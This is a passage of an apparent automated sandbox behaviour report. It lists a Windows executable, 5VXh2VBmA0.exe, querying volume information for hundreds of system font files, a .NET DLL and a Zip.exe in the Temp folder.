                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Zip.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Zip.exe VolumeInformation
